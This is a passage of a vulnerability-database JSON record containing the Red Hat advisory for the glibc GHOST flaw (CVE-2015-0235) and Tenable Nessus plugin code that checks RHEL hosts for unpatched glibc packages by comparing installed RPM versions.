script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^(5\\.6|5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", 
reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if 
(rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-headers-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-static-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-static-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-static-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-utils-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", 
reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"nscd-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"nscd-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"nscd-2.12-1.132.el6_5.5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n }\n}\n", "title": "RHEL 6 : glibc (RHSA-2015:0099) (GHOST)", "type": "nessus", "viewCount": 2}, "differentElements": ["modified", "sourceData", "title"], "edition": 10, "lastseen": "2018-12-15T03:59:03"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2015-0235"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support.\n\nRed Hat Product Security has rated this update as having Critical security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the Name Server Caching Daemon (nscd) used by multiple programs on the system. 
Without these libraries, the Linux system cannot function correctly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the gethostbyname() and gethostbyname2() glibc function calls. A remote attacker able to make an application call either of these functions could use this flaw to execute arbitrary code with the permissions of the user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "edition": 1, "hash": "654525b91e7c216acff1589a5737f2525d35cd34ccd4b59de54ed0c9fb0882e5", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "5a30b331c491a149b274795dcb31aa8e", "key": "description"}, {"hash": "841f459c9764bcdcd6d5a1955f15a6d5", "key": "cvelist"}, {"hash": "aff19e7d2f5800fbf65dc3d944df032a", "key": "cvss"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "3d8d634cf2d0899c0d90aff4e213fae6", "key": "published"}, {"hash": "171fe111432bb959f6bfd6b01e5adbc8", "key": "sourceData"}, {"hash": "cf5ab192321e0c9602e97a714f8a5102", "key": "modified"}, {"hash": "813366c4a714f890ad158fca7c40bbaf", "key": "pluginID"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "cbab536cd5fdc2c0e0d64b3cdab702d9", "key": "title"}, {"hash": "2091fc8b5268a0c4b492e97e601c3a5f", "key": "references"}, {"hash": "341a141f8365cdd9e626c9fa294e819c", "key": "href"}, {"hash": "b46559ea68ec9a13474c3a7776817cfd", "key": "naslFamily"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=81068", "id": "REDHAT-RHSA-2015-0099.NASL", "lastseen": "2016-09-26T17:25:21", "modified": "2015-10-22T00:00:00", "naslFamily": "Red Hat Local Security Checks", "objectVersion": "1.2", "pluginID": "81068", 
"published": "2015-01-29T00:00:00", "references": ["http://rhn.redhat.com/errata/RHSA-2015-0099.html", "https://www.redhat.com/security/data/cve/CVE-2015-0235.html"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:0099. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(81068);\n script_version(\"$Revision: 1.12 $\");\n script_cvs_date(\"$Date: 2015/10/22 14:23:02 $\");\n\n script_cve_id(\"CVE-2015-0235\");\n script_osvdb_id(117579);\n script_xref(name:\"RHSA\", value:\"2015:0099\");\n\n script_name(english:\"RHEL 5 / 6 : glibc (RHSA-2015:0099) (GHOST)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux\n5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced\nUpdate Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended\nUpdate Support.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nName Server Caching Daemon (nscd) used by multiple programs on the\nsystem. 
Without these libraries, the Linux system cannot function\ncorrectly.\n\nA heap-based buffer overflow was found in glibc's\n__nss_hostname_digits_dots() function, which is used by the\ngethostbyname() and gethostbyname2() glibc function calls. A remote\nattacker able to make an application call either of these functions\ncould use this flaw to execute arbitrary code with the permissions of\nthe user running the application. (CVE-2015-0235)\n\nRed Hat would like to thank Qualys for reporting this issue.\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.redhat.com/security/data/cve/CVE-2015-0235.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://rhn.redhat.com/errata/RHSA-2015-0099.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Exim GHOST (glibc gethostbyname) Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n 
script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.5\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/01/28\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/01/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2018 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.6|5\\.9|6\\.2|6\\.4|6\\.5)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.6 / 5.9 / 6.2 / 6.4 / 6.5\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2015:0099\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{ sp = get_kb_item(\"Host/RedHat/minor_release\");\n if (isnull(sp)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
sp:\"6\", cpu:\"i386\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-debuginfo-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i686\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-debuginfo-common-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", reference:\"glibc-devel-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-devel-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", 
sp:\"9\", cpu:\"i386\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-headers-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"glibc-utils-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"i386\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"s390x\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"6\", cpu:\"x86_64\", reference:\"nscd-2.5-58.el5_6.6\")) flag++;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"x86_64\", reference:\"nscd-2.5-107.el5_9.8\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"i686\", 
reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"i686\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"s390x\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", cpu:\"x86_64\", reference:\"glibc-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-debuginfo-common-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-debuginfo-common-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.12-1.47.el6_2.15\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"4\", reference:\"glibc-devel-2.12-1.107.el6_4.7\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"5\", reference:\"glibc-devel-2.12-1.132.el6_5.5\")) flag++;\n if (rpm_check(release:\"RHEL6\", sp:\"2\", cpu:\"i686\", reference:\"glibc-devel-2.12-1.47.el6_2.15\")) flag++;\n if 
